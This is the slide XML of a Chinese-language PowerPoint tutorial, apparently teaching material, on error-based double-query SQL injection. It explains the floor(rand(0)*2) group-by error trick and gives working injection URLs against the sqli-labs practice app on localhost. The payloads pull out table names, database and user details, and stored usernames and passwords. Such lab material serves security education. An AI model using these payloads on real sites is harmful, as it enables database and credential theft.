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报错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注入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553210"/>
            <a:ext cx="9841230" cy="4636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434465" y="2914650"/>
            <a:ext cx="4382770" cy="1489075"/>
            <a:chOff x="4298950" y="2274888"/>
            <a:chExt cx="4382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70715" cy="549275"/>
              <a:chOff x="3702051" y="2081213"/>
              <a:chExt cx="3070715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500803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报错注入</a:t>
                </a:r>
                <a:r>
                  <a:rPr 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985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GET单引号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报错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73813" y="2941638"/>
            <a:ext cx="4382769" cy="1458912"/>
            <a:chOff x="4298950" y="4113213"/>
            <a:chExt cx="43827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985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双引号报错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434465" y="2914650"/>
            <a:ext cx="4382770" cy="1489075"/>
            <a:chOff x="4298950" y="2274888"/>
            <a:chExt cx="4382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70715" cy="549275"/>
              <a:chOff x="3702051" y="2081213"/>
              <a:chExt cx="3070715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500803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报错注入</a:t>
                </a:r>
                <a:r>
                  <a:rPr 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985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GET单引号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报错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73813" y="2941638"/>
            <a:ext cx="4382769" cy="1458912"/>
            <a:chOff x="4298950" y="4113213"/>
            <a:chExt cx="43827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985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双引号报错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报错注入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05791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报错注入</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>形式上是两个嵌套的查询，即select …(select …)，里面的那个select被称为子查询，他的执行顺序也是先执行子查询，然后再执行外面的select，双注入主要涉及到了几个sql函数：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rand()随机函数，返回0~1之间的某个值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floor(a)取整函数，返回小于等于a，且值最接近a的一个整数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count()聚合函数也称作计数函数，返回查询对象的总数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group by cl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ause</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>分组语句，按照查询结果分组 </a:t>
            </a:r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通过报错来显示出具体的信息。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364998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查询的时候如果使用rand()的话，该值会被计算多次</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>。在使用group by的时候，floor(rand(0)*2)会被执行一次，如果虚表不存在记录，插入虚表的时候会再被执行一次。在一次多记录的查询过程中floor(rand(0)*2)的值是定性的，为011011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select count(*) from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>table</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> group by floor(rand(0)*2);</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" alt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GET单引号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报错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290" y="2583180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获取表名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http://localhost/sqli-lab/Less-5/index.php?id= 0' union select 1,2,3 from (select count(*),concat((select concat(table_name,0x3a,0x3a) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+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80518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Sqli-Lab Less 5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>为例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获取数据库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http://localhost/sqli-lab/Less-5/index.php?id= 0' union select 1,2,3 from (select count(*),concat((select concat(version(),0x3a,0x3a,database(),0x3a,0x3a,user(),0x3a) limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+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4388485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获取用户信息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http://localhost/sqli-lab/Less-5/index.php?id= 0' union select 1,2,3 from (select count(*),concat((select concat(username,0x3a, 0x3a,password,0x3a, 0x3a) from security.users limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+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2583180"/>
            <a:ext cx="8916035" cy="2901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双引号报错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获取数据库</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN"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http://localhost/sqli-lab/Less-6/index.php?id= 0" union select count(*),0,concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))as a from information_schema.tables group by a limit 0,10 --+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1945005"/>
            <a:ext cx="4980940" cy="3923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1897380"/>
            <a:ext cx="4095115" cy="4018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0" y="1714500"/>
            <a:ext cx="8617585" cy="3429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报错注入介绍</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>GET单引号堆叠查询注入</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>GET双引号堆叠查询注入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149</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-08-20T13:57:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-09-04T10:55:45Z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